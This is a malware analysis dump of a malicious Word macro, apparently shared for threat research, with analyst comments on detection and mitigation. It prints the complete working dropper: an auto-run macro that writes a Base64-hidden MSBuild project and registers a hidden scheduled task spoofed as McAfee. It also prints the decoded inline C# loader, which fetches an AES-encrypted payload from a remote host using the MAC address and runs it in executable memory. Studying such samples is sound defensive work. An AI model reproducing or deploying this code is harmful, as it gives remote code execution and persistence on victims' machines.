VBA DOC Malware MSBuild Scheduled Task
## uploaded by @JohnLaTwC
## Sample Hash: 9e910797589da01a4b13ecb7fcd58f81dfc18784dd6ed4996e5a5f8f1f95e224
## Sample evolution:
## c2e126498e61d4dc4154b5721dfd9811cd1d8c84063477e271134f0ed30e29ea
## df7fc66bcceaf9b041fe839b5cda95dfad14c8475c6e2ec49dc23d5ae3ba62ac
## b621015caa6077d7e85807c7f1509f88d5560d3e4ef439f578edc43f7b01c071
## 7d2bf283d12bc6914708e2a4240c2cefbd1871c3b4ac3c9b2a70ea7553fb7f4a
## 13fc853eb0e59b8133f93a3f55ed4086ffa8545aecef513f0bfe8363467fb110
## 5e53334b062c7c908a7354c77343e7d356959727930f2557b5e65b936b2cd462
olevba3 0.53.1 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OLE:MASIHB-- 9e910797589da01a4b13ecb7fcd58f81dfc18784dd6ed4996e5a5f8f1f95e224
===============================================================================
FILE: 9e910797589da01a4b13ecb7fcd58f81dfc18784dd6ed4996e5a5f8f1f95e224
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: 9e910797589da01a4b13ecb7fcd58f81dfc18784dd6ed4996e5a5f8f1f95e224 - OLE stream: 'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' Auto-run entry point: Word fires Document_Open as soon as the document is
' opened with macros enabled; no further user interaction is needed.
Private Sub Document_Open()
Dim msbPath As String
' Resolves %windir%\Microsoft.NET\Framework64\v4.0.30319\msbuild.exE (Windows
' paths are case-insensitive). The extension is concatenated from fragments,
' presumably so the literal "msbuild.exe" never appears in the macro text for
' string-based scanners.
msbPath = Environ("windir") & "\Microsoft.NET\Framework64\v4.0.30319\msbuild" & ".e" & "x" & "E"
' Dir() returns "" when the path does not exist (no 64-bit .NET 4.x); the
' "requirements" message box is then the only visible effect.
If (Len(Dir(msbPath)) = 0) Then
MsgBox "System requirements not satisfied"
Else
' Drop the MSBuild project (Foo), then register the scheduled task (Bar).
' Detection: an Office process resolving and later scheduling msbuild.exe, a
' signed Microsoft binary routinely abused as a proxy executor; allow-listing
' by signer alone does not stop this path.
Foo (msbPath)
End If
End Sub
' Base64 -> Byte() via the MSXML DOM: an element whose dataType is
' "bin.base64" exposes its decoded bytes through nodeTypedValue. Used by Foo to
' rebuild the dropped project file, so the project text is never present in the
' macro source in the clear. Requires the MSXML2 type library reference.
'   strData: Base64 text.
'   Returns: the decoded bytes.
Private Function decodeBase64(ByVal strData As String) As Byte()
Dim objXML As MSXML2.DOMDocument
Dim objNode As MSXML2.IXMLDOMElement
Set objXML = New MSXML2.DOMDocument
' The element name is arbitrary; only dataType drives the conversion.
Set objNode = objXML.createElement("b64")
objNode.dataType = "bin.base64"
objNode.Text = strData
decodeBase64 = objNode.nodeTypedValue
Set objNode = Nothing
Set objXML = Nothing
End Function
' Stage 1 dropper: writes the MSBuild project reconstructed from the Base64
' chunks below to %TEMP%\sales.msproj, then calls Bar to persist it.
' The decoded content is the <Project> listed under "## dropped file:" further
' down this page: a CodeTaskFactory inline C# task that downloads, AES-decrypts
' and runs a payload inside the msbuild.exe process.
' Each Print statement ends with ";", which suppresses the line terminator, so
' the chunks are written back to back. The chunk boundaries appear to fall
' mid-token, which is why names such as VirtualAlloc or CreateThread do not
' show up in a string scan of the macro itself -- decode before triaging.
' Detection / hunting: an Office process creating a file under %TEMP% whose
' extension ends in "proj"; msbuild.exe is not launched from here (no Shell
' call), the scheduled task registered by Bar does that.
'   msbPath: full path to msbuild.exe, passed through to Bar.
Private Sub Foo(msbPath As String)
' myFile is never declared (no Option Explicit), so it is an implicit Variant.
myFile = Environ("TEMP") & "\sales.msproj"
Open myFile For Output As #1
Print #1, decodeBase64("PFByb2plY3QgVG9vbHNWZXJzaW9uPSI0LjAiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL2RldmVsb3Blci9tc2J1aWxkLzIwMDMiPgogICAgPFRhcmdldCBOYW1lPSJIZWxsbyI+CiAgICAgICAgPENsYXM=");
Print #1, decodeBase64("c0V4YW1wbGUgLz4KICAgIDwvVGFyZ2V0PgogICAgPFVzaW5nVGFzawogICAgICAgIFRhc2tOYW1lPSJDbGFzc0V4YW1wbGUiCiAgICAgICAgVGFza0ZhY3Rvcnk9IkNvZGVUYXNrRmFjdG9yeSIKICAgICAgICBBc3NlbWJseUY=");
Print #1, decodeBase64("aWxlPSJDOlxXaW5kb3dzXE1pY3Jvc29mdC5OZXRcRnJhbWV3b3JrXHY0LjAuMzAzMTlcTWljcm9zb2Z0LkJ1aWxkLlRhc2tzLnY0LjAuZGxsIiA+CiAgICAgICAgICAgIDxUYXNrPgogICAgICAgIDxDb2RlIFR5cGU9IkNsYXM=");
Print #1, decodeBase64("cyIgTGFuZ3VhZ2U9ImNzIj4KICAgICAgICAgICAgPCFbQ0RBVEFbCiAgICAgICAgICAgICAgICB1c2luZyBTeXN0ZW07CiAgICAgICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuRnJhbWV3b3JrOwogICAgICAgICA=");
Print #1, decodeBase64("ICAgICAgIHVzaW5nIE1pY3Jvc29mdC5CdWlsZC5VdGlsaXRpZXM7CiAgICAgICAgICAgICAgICB1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7CiAgICAgICAgICAgICAgICB1c2luZyBTeXN0ZW0uTmV0Owo=");
Print #1, decodeBase64("ICAgICAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5OZXQuTmV0d29ya0luZm9ybWF0aW9uOwogICAgICAgICAgICAgICAgdXNpbmcgU3lzdGVtLklPOwogICAgICAgICAgICAgICAgdXNpbmcgU3lzdGVtLkxpbnE7CiAgICAgICA=");
Print #1, decodeBase64("ICAgICAgICAgdXNpbmcgU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeTsKCiAgICAgICAgICAgICAgICBwdWJsaWMgY2xhc3MgQ2xhc3NFeGFtcGxlIDogIFRhc2ssIElUYXNrCiAgICAgICAgICAgICAgICB7CiAgICAgICA=");
Print #1, decodeBase64("ICAgICAgICAgICAgIFtGbGFnc10KICAgICAgICAgICAgICAgICAgICBwdWJsaWMgZW51bSBBbGxvY2F0aW9uVHlwZSA6IHVpbnQKICAgICAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgICAgIENPTU1JVCA=");
Print #1, decodeBase64("PSAweDEwMDAsCiAgICAgICAgICAgICAgICAgICAgICAgIFJFU0VSVkUgPSAweDIwMDAsCiAgICAgICAgICAgICAgICAgICAgICAgIFJFU0VUID0gMHg4MDAwMCwKICAgICAgICAgICAgICAgICAgICAgICAgTEFSR0VfUEFHRVM=");
Print #1, decodeBase64("ID0gMHgyMDAwMDAwMCwKICAgICAgICAgICAgICAgICAgICAgICAgUEhZU0lDQUwgPSAweDQwMDAwMCwKICAgICAgICAgICAgICAgICAgICAgICAgVE9QX0RPV04gPSAweDEwMDAwMCwKICAgICAgICAgICAgICAgICAgICAgICA=");
Print #1, decodeBase64("IFdSSVRFX1dBVENIID0gMHgyMDAwMDAKICAgICAgICAgICAgICAgICAgICB9CgogICAgICAgICAgICAgICAgICAgIFtGbGFnc10KICAgICAgICAgICAgICAgICAgICBwdWJsaWMgZW51bSBNZW1vcnlQcm90ZWN0aW9uIDogdWk=");
Print #1, decodeBase64("bnQKICAgICAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgICAgIEVYRUNVVEUgPSAweDEwLAogICAgICAgICAgICAgICAgICAgICAgICBFWEVDVVRFX1JFQUQgPSAweDIwLAogICAgICAgICAgICAgICAgICA=");
Print #1, decodeBase64("ICAgICAgRVhFQ1VURV9SRUFEV1JJVEUgPSAweDQwLAogICAgICAgICAgICAgICAgICAgICAgICBFWEVDVVRFX1dSSVRFQ09QWSA9IDB4ODAsCiAgICAgICAgICAgICAgICAgICAgICAgIE5PQUNDRVNTID0gMHgwMSwKICAgICA=");
Print #1, decodeBase64("ICAgICAgICAgICAgICAgICAgIFJFQURPTkxZID0gMHgwMiwKICAgICAgICAgICAgICAgICAgICAgICAgUkVBRFdSSVRFID0gMHgwNCwKICAgICAgICAgICAgICAgICAgICAgICAgV1JJVEVDT1BZID0gMHgwOCwKICAgICAgICA=");
Print #1, decodeBase64("ICAgICAgICAgICAgICAgIEdVQVJEX01vZGlmaWVyZmxhZyA9IDB4MTAwLAogICAgICAgICAgICAgICAgICAgICAgICBOT0NBQ0hFX01vZGlmaWVyZmxhZyA9IDB4MjAwLAogICAgICAgICAgICAgICAgICAgICAgICBXUklURUM=");
Print #1, decodeBase64("T01CSU5FX01vZGlmaWVyZmxhZyA9IDB4NDAwCiAgICAgICAgICAgICAgICAgICAgfQoKICAgICAgICAgICAgICAgICAgICBbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiLCBTZXRMYXN0RXJyb3IgPSB0cnVlKV0KICAgICAgICA=");
Print #1, decodeBase64("ICAgICAgICAgICAgc3RhdGljIGV4dGVybiBJbnRQdHIgVmlydHVhbEFsbG9jKEludFB0ciBscEFkZHJlc3MsIFVJbnRQdHIgZHdTaXplLCBBbGxvY2F0aW9uVHlwZSBmbEFsbG9jYXRpb25UeXBlLCBNZW1vcnlQcm90ZWN0aW8=");
Print #1, decodeBase64("biBmbFByb3RlY3QpOwoKICAgICAgICAgICAgICAgICAgICBbRGxsSW1wb3J0KCJrZXJuZWwzMiIpXQogICAgICAgICAgICAgICAgICAgIHByaXZhdGUgc3RhdGljIGV4dGVybiBJbnRQdHIgQ3JlYXRlVGhyZWFkKAogICAgICA=");
Print #1, decodeBase64("ICAgICAgICAgICAgICAgICAgSW50UHRyIGxwVGhyZWFkQXR0cmlidXRlcywKICAgICAgICAgICAgICAgICAgICAgICAgVUludDMyIGR3U3RhY2tTaXplLAogICAgICAgICAgICAgICAgICAgICAgICBJbnRQdHIgbHBTdGFydEE=");
Print #1, decodeBase64("ZGRyZXNzLAogICAgICAgICAgICAgICAgICAgICAgICBJbnRQdHIgcGFyYW0sCiAgICAgICAgICAgICAgICAgICAgICAgIFVJbnQzMiBkd0NyZWF0aW9uRmxhZ3MsCiAgICAgICAgICAgICAgICAgICAgICAgIEludFB0ciBscFQ=");
Print #1, decodeBase64("aHJlYWRJZAogICAgICAgICAgICAgICAgICAgICk7CgogICAgICAgICAgICAgICAgICAgIFtEbGxJbXBvcnQoImtlcm5lbDMyIildCiAgICAgICAgICAgICAgICAgICAgcHJpdmF0ZSBzdGF0aWMgZXh0ZXJuIFVJbnQzMiBXYWk=");
Print #1, decodeBase64("dEZvclNpbmdsZU9iamVjdCgKICAgICAgICAgICAgICAgICAgICAgICAgSW50UHRyIGhIYW5kbGUsCiAgICAgICAgICAgICAgICAgICAgICAgIFVJbnQzMiBkd01pbGxpc2Vjb25kcwogICAgICAgICAgICAgICAgICAgICk7Cgo=");
Print #1, decodeBase64("ICAgICAgICAgICAgICAgICAgICBbVW5tYW5hZ2VkRnVuY3Rpb25Qb2ludGVyQXR0cmlidXRlKENhbGxpbmdDb252ZW50aW9uLkNkZWNsKV0KICAgICAgICAgICAgICAgICAgICBwdWJsaWMgZGVsZWdhdGUgSW50MzIgRXhlY3U=");
Print #1, decodeBase64("dGVEZWxlZ2F0ZSgpOwoKICAgICAgICAgICAgICAgICAgICBwdWJsaWMgdm9pZCBQcmVwcm9jZXNzKCkKICAgICAgICAgICAgICAgICAgICB7ICAgCgogICAgICAgICAgICAgICAgICAgICAgICB0cnkKICAgICAgICAgICAgICA=");
Print #1, decodeBase64("ICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZhciBtYWNBZGRyID0gCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAoCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZnJvbSBuaWMgaW4=");
Print #1, decodeBase64("IE5ldHdvcmtJbnRlcmZhY2UuR2V0QWxsTmV0d29ya0ludGVyZmFjZXMoKQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdoZXJlIG5pYy5PcGVyYXRpb25hbFN0YXR1cyA9PSBPcGVyYXRpb25hbFN0YXR1cy5VcAo=");
Print #1, decodeBase64("ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzZWxlY3QgbmljLkdldFBoeXNpY2FsQWRkcmVzcygpLlRvU3RyaW5nKCkKICAgICAgICAgICAgICAgICAgICAgICAgICAgICkuRmlyc3RPckRlZmF1bHQoKTsKCiAgICA=");
Print #1, decodeBase64("ICAgICAgICAgICAgICAgICAgICAgICAgU3RyaW5nIHVybCA9IFN0cmluZy5Gb3JtYXQoImh0dHBzOi8vZm9vLmNvbS9wYXRoP2NpZD17MH0iLCBtYWNBZGRyKTsKCiAgICAgICAgICAgICAgICAgICAgICAgICAgICB1c2luZyA=");
Print #1, decodeBase64("KFdlYkNsaWVudCBjbGllbnQgPSBuZXcgV2ViQ2xpZW50KCkpCiAgICAgICAgICAgICAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdXNpbmcgKFN0cmVhbSBzdHJlYW0gPSBjbGllbnQ=");
Print #1, decodeBase64("Lk9wZW5SZWFkKHVybCkpCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBieXRlW10gc2MgPSBEcmFpblBpcGUoc3RyZWFtKTsKICAgICAgICAgICA=");
Print #1, decodeBase64("ICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbnRQdHIgZnVuY0FkZHIgPSBWaXJ0dWFsQWxsb2MoSW50UHRyLlplcm8sIChVSW50UHRyKXNjLkxlbmd0aCwgQWw=");
Print #1, decodeBase64("bG9jYXRpb25UeXBlLlJFU0VSVkUgfCBBbGxvY2F0aW9uVHlwZS5DT01NSVQsIE1lbW9yeVByb3RlY3Rpb24uRVhFQ1VURV9SRUFEV1JJVEUpOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNYXJzaGFsLkM=");
Print #1, decodeBase64("b3B5KHNjLCAwLCAoSW50UHRyKShmdW5jQWRkciksIHNjLkxlbmd0aCk7CgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbnRQdHIgaFRocmVhZCA9IEludFB0ci5aZXJvOwoKICAgICAgICAgICAgICAgICA=");
Print #1, decodeBase64("ICAgICAgICAgICAgICAgICAgIGhUaHJlYWQgPSBDcmVhdGVUaHJlYWQoSW50UHRyLlplcm8sIDAsIGZ1bmNBZGRyLCBJbnRQdHIuWmVybywgMCwgSW50UHRyLlplcm8pOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICA=");
Print #1, decodeBase64("ICAgICAgV2FpdEZvclNpbmdsZU9iamVjdChoVGhyZWFkLCAweEZGRkZGRkZGKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICA=");
Print #1, decodeBase64("ICAgICAgICB9CiAgICAgICAgICAgICAgICAgICAgICAgIGNhdGNoIChFeGNlcHRpb24pIHt9ICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgfQoKICAgICAgICAgICAgICAgICAgICBwdWJsaWM=");
Print #1, decodeBase64("IHN0YXRpYyBieXRlW10gRHJhaW5QaXBlKFN0cmVhbSBzdHJlYW0pCiAgICAgICAgICAgICAgICAgICAgewogICAgICAgICAgICAgICAgICAgICAgICBieXRlW10gYnVmZmVyID0gbmV3IGJ5dGVbMjA0OF07CiAgICAgICAgICA=");
Print #1, decodeBase64("ICAgICAgICAgICAgICBieXRlW10gaXYgPSBuZXcgYnl0ZVsxNl0geyAweDZiLDB4MTgsMHhiNywweDE1LDB4NDMsMHhhYiwweGMzLDB4MzAsMHhlOSwweDZkLDB4YTUsMHhlYSwweDU3LDB4MzUsMHhjNiwweGYxIH07CiAgICA=");
Print #1, decodeBase64("ICAgICAgICAgICAgICAgICAgICBieXRlW10ga2V5ID0gbmV3IGJ5dGVbMTZdIHsgMHg3YSwweDc5LDB4YTcsMHhlMiwweDNhLDB4NWMsMHg5YywweGU0LDB4MmEsMHgxMywweDgsMHhlOCwweGJhLDB4YzcsMHg2NSwweGFlIH0=");
Print #1, decodeBase64("OwoKICAgICAgICAgICAgICAgICAgICAgICAgQWVzIGVuY3J5cHRvciA9IEFlcy5DcmVhdGUoKTsKICAgICAgICAgICAgICAgICAgICAgICAgZW5jcnlwdG9yLk1vZGUgPSBDaXBoZXJNb2RlLkNCQzsKICAgICAgICAgICAgICA=");
Print #1, decodeBase64("ICAgICAgICAgIGVuY3J5cHRvci5QYWRkaW5nID0gUGFkZGluZ01vZGUuUEtDUzc7CiAgICAgICAgICAgICAgICAgICAgICAgIGVuY3J5cHRvci5LZXkgPSBrZXk7CiAgICAgICAgICAgICAgICAgICAgICAgIGVuY3J5cHRvci4=");
Print #1, decodeBase64("SVYgPSBpdjsKICAgICAgICAgICAgICAgICAgICAgICAgSUNyeXB0b1RyYW5zZm9ybSBkZWNyeXB0b3IgPSBlbmNyeXB0b3IuQ3JlYXRlRGVjcnlwdG9yKCk7CiAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICA=");
Print #1, decodeBase64("ICAgICAgICAgICAgdXNpbmcgKE1lbW9yeVN0cmVhbSBtcyA9IG5ldyBNZW1vcnlTdHJlYW0oKSkKICAgICAgICAgICAgICAgICAgICAgICAgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgdXNpbmcgKENyeXB0b1N0cmU=");
Print #1, decodeBase64("YW0gY3MgPSBuZXcgQ3J5cHRvU3RyZWFtKG1zLCBkZWNyeXB0b3IsIENyeXB0b1N0cmVhbU1vZGUuV3JpdGUpKQogICAgICAgICAgICAgICAgICAgICAgICAgICAgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHc=");
Print #1, decodeBase64("aGlsZSAodHJ1ZSkKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGludCByZWFkID0gc3RyZWFtLlJlYWQoYnVmZmVyLCAwLCBidWZmZXIuTGVuZ3Q=");
Print #1, decodeBase64("aCk7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmIChyZWFkIDw9IDApCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA=");
Print #1, decodeBase64("ICAgICBjcy5GbHVzaEZpbmFsQmxvY2soKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJldHVybiBtcy5Ub0FycmF5KCk7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KICA=");
Print #1, decodeBase64("ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY3MuV3JpdGUoYnVmZmVyLCAwLCByZWFkKTsKICAgICAgICAgICAgICAgICAgICAgICAgICA=");
Print #1, decodeBase64("ICAgICAgfQogICAgICAgICAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICAgICAgfQoKICAgICAgICAgICAgICAgICAgICBwdWJsaWMgb3ZlcnJpZGUgYm9vbCA=");
Print #1, decodeBase64("RXhlY3V0ZSgpCiAgICAgICAgICAgICAgICAgICAgewogICAgICAgICAgICAgICAgICAgICAgICBQcmVwcm9jZXNzKCk7CiAgICAgICAgICAgICAgICAgICAgICAgIHJldHVybiB0cnVlOwogICAgICAgICAgICAgICAgICAgIH0=");
Print #1, decodeBase64("CiAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICBdXT4KICAgICAgICAgICAgPC9Db2RlPgogICAgICAgIDwvVGFzaz4KICAgIDwvVXNpbmdUYXNrPgo8L1Byb2plY3Q+Cgo=");
Close #1
' Hand off to persistence (the scheduled task is what later runs msbuild.exe).
Bar (msbPath)
End Sub
' Stage 2 persistence: registers a hidden Task Scheduler 2.0 task named
' "McAfee Document Protection" (author spoofed as "McAfee Corporation") whose
' action is msbuild.exe with %TEMP% -- where Foo dropped sales.msproj -- as the
' working directory, repeating every 60 minutes. How MSBuild interprets the
' GUID passed as its only argument cannot be determined from this listing.
' The Const values are Task Scheduler enum members (TASK_TRIGGER_TIME = 1,
' TASK_ACTION_EXEC = 0, TASK_CREATE_OR_UPDATE = 6, TASK_LOGON_S4U = 2).
' Detection / hunting: "Schedule.Service" COM instantiation from an Office
' process; task-registration events (Security 4698, TaskScheduler/Operational
' 106) whose action path is msbuild.exe; Hidden tasks carrying a vendor name as
' author; S4U logon (runs as the user with no stored password). Mitigation:
' restrict msbuild.exe on non-developer endpoints (AppLocker / WDAC; it is in
' Microsoft's recommended block rules) and block macros from internet-sourced
' documents.
'   msbPath: path to msbuild.exe, used as the task's Action.Path.
Private Sub Bar(msbPath As String)
Const TriggerTypeTime = 1
Const TASK_ACTION_EXEC = 0
Const TASK_CREATE_OR_UPDATE = 6
Const TASK_LOGON_S4U = 2
' service is undeclared (no Option Explicit) -> implicit Variant holding the COM object.
Set service = CreateObject("Schedule.Service")
' Connect with no arguments targets the local machine as the current user.
Call service.Connect
Dim rootFolder
' Root folder ("\"): the task is listed at the top level of Task Scheduler.
Set rootFolder = service.GetFolder("\")
Dim taskDefinition
Set taskDefinition = service.NewTask(0)
Dim regInfo
Set regInfo = taskDefinition.RegistrationInfo
' Cosmetic metadata chosen to look like a vendor component.
regInfo.Author = "McAfee Corporation"
regInfo.Date = "2017-12-11T13:21:17-01:00"
Dim settings
Set settings = taskDefinition.settings
settings.Enabled = True
' StartBoundary below is a fixed past timestamp; StartWhenAvailable makes the
' missed start fire as soon as the task is registered.
settings.StartWhenAvailable = True
' Hidden tasks are not shown in the Task Scheduler UI unless "Show Hidden Tasks" is enabled.
settings.Hidden = True
Dim triggers
Set triggers = taskDefinition.triggers
Dim trigger
Set trigger = triggers.Create(TriggerTypeTime)
trigger.Enabled = True
trigger.StartBoundary = "2017-12-11T13:21:17-01:00"
' ISO 8601 duration: repeat every 60 minutes, no repetition duration set (indefinite).
trigger.Repetition.Interval = "PT60M"
Dim Action
Set Action = taskDefinition.Actions.Create(TASK_ACTION_EXEC)
Action.Path = msbPath
Action.Arguments = "25804802-f420-498c-a61e-b0612c8e735d"
' Working directory is the folder that holds the dropped sales.msproj.
Action.WorkingDirectory = Environ("TEMP")
' Omitted positional arguments are userId and password; logon type is S4U.
Call rootFolder.RegisterTaskDefinition("McAfee Document Protection", taskDefinition, TASK_CREATE_OR_UPDATE, , , TASK_LOGON_S4U)
End Sub
-------------------------------------------------------------------------------
VBA MACRO Module1.bas
in file: 9e910797589da01a4b13ecb7fcd58f81dfc18784dd6ed4996e5a5f8f1f95e224 - OLE stream: 'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
## dropped file:
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
using System.Runtime.InteropServices;
using System.Net;
using System.Net.NetworkInformation;
using System.IO;
using System.Linq;
using System.Security.Cryptography;
// Inline-task payload: compiled by CodeTaskFactory and executed inside
// msbuild.exe when the "Hello" target of the enclosing <Project> runs.
// Chain: pick a MAC address -> HTTPS GET with it as ?cid= -> AES-CBC decrypt the
// response with the hard-coded key/IV below -> copy into RWX memory -> run it
// on a new thread. Every failure is swallowed and Execute() returns true, so
// the build (and the scheduled task's last-run result) reports success no
// matter what happened.
// Detection: msbuild.exe making outbound HTTPS with a MAC address in the query
// string; msbuild.exe allocating EXECUTE_READWRITE memory and starting a thread
// at an address not backed by a loaded image; msbuild.exe started by the Task
// Scheduler with %TEMP% as its working directory.
public class ClassExample : Task, ITask
{
// Subset of VirtualAlloc flAllocationType values (MEM_COMMIT, MEM_RESERVE, ...).
[Flags]
public enum AllocationType : uint
{
COMMIT = 0x1000,
RESERVE = 0x2000,
RESET = 0x80000,
LARGE_PAGES = 0x20000000,
PHYSICAL = 0x400000,
TOP_DOWN = 0x100000,
WRITE_WATCH = 0x200000
}
// Subset of PAGE_* protection values; only EXECUTE_READWRITE (0x40) is used.
[Flags]
public enum MemoryProtection : uint
{
EXECUTE = 0x10,
EXECUTE_READ = 0x20,
EXECUTE_READWRITE = 0x40,
EXECUTE_WRITECOPY = 0x80,
NOACCESS = 0x01,
READONLY = 0x02,
READWRITE = 0x04,
WRITECOPY = 0x08,
GUARD_Modifierflag = 0x100,
NOCACHE_Modifierflag = 0x200,
WRITECOMBINE_Modifierflag = 0x400
}
// kernel32 P/Invoke declarations used by Preprocess().
[DllImport("kernel32.dll", SetLastError = true)]
static extern IntPtr VirtualAlloc(IntPtr lpAddress, UIntPtr dwSize, AllocationType flAllocationType, MemoryProtection flProtect);
[DllImport("kernel32")]
private static extern IntPtr CreateThread(
IntPtr lpThreadAttributes,
UInt32 dwStackSize,
IntPtr lpStartAddress,
IntPtr param,
UInt32 dwCreationFlags,
IntPtr lpThreadId
);
[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(
IntPtr hHandle,
UInt32 dwMilliseconds
);
// Declared but never referenced in this class.
[UnmanagedFunctionPointerAttribute(CallingConvention.Cdecl)]
public delegate Int32 ExecuteDelegate();
// Downloads, decrypts and runs the second stage; called from Execute().
public void Preprocess()
{
try
{
// Physical (MAC) address of the first NIC reporting OperationalStatus.Up,
// rendered as a separator-free hex string; sent as a host identifier.
var macAddr =
(
from nic in NetworkInterface.GetAllNetworkInterfaces()
where nic.OperationalStatus == OperationalStatus.Up
select nic.GetPhysicalAddress().ToString()
).FirstOrDefault();
// foo.com in this listing is presumably a sanitised placeholder for the
// real download host; the ?cid=<MAC> pattern is the network indicator.
String url = String.Format("https://foo.com/path?cid={0}", macAddr);
using (WebClient client = new WebClient())
{
// OpenRead issues a GET and streams the body straight into DrainPipe.
using (Stream stream = client.OpenRead(url))
{
byte[] sc = DrainPipe(stream);
// RWX allocation sized to the decrypted payload, followed by a raw copy.
IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)sc.Length, AllocationType.RESERVE | AllocationType.COMMIT, MemoryProtection.EXECUTE_READWRITE);
Marshal.Copy(sc, 0, (IntPtr)(funcAddr), sc.Length);
IntPtr hThread = IntPtr.Zero;
// The buffer itself is the thread start address: decrypted bytes run as code.
hThread = CreateThread(IntPtr.Zero, 0, funcAddr, IntPtr.Zero, 0, IntPtr.Zero);
// 0xFFFFFFFF is INFINITE: msbuild.exe blocks until that thread exits.
WaitForSingleObject(hThread, 0xFFFFFFFF);
}
}
}
// Network, crypto and allocation errors are all discarded silently.
catch (Exception) {}
}
// Reads the stream to EOF and decrypts it with AES-CBC (16-byte key, i.e.
// AES-128) and PKCS7 padding using the embedded key/IV. Because both are in
// the dropped file, captured traffic from this sample can be decrypted offline
// for analysis.
public static byte[] DrainPipe(Stream stream)
{
byte[] buffer = new byte[2048];
// Hard-coded IV and key (specific to this sample; see the hashes at the top of the page).
byte[] iv = new byte[16] { 0x6b,0x18,0xb7,0x15,0x43,0xab,0xc3,0x30,0xe9,0x6d,0xa5,0xea,0x57,0x35,0xc6,0xf1 };
byte[] key = new byte[16] { 0x7a,0x79,0xa7,0xe2,0x3a,0x5c,0x9c,0xe4,0x2a,0x13,0x8,0xe8,0xba,0xc7,0x65,0xae };
// Despite the name, this Aes instance is only used to build a decryptor; it is never disposed.
Aes encryptor = Aes.Create();
encryptor.Mode = CipherMode.CBC;
encryptor.Padding = PaddingMode.PKCS7;
encryptor.Key = key;
encryptor.IV = iv;
ICryptoTransform decryptor = encryptor.CreateDecryptor();
using (MemoryStream ms = new MemoryStream())
{
using (CryptoStream cs = new CryptoStream(ms, decryptor, CryptoStreamMode.Write))
{
// Feed each chunk through the decryptor; on EOF flush the final padded
// block and return the plaintext.
while (true)
{
int read = stream.Read(buffer, 0, buffer.Length);
if (read <= 0)
{
cs.FlushFinalBlock();
return ms.ToArray();
}
cs.Write(buffer, 0, read);
}
}
}
}
// MSBuild task entry point; unconditionally reports success to the build.
public override bool Execute()
{
Preprocess();
return true;
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>
'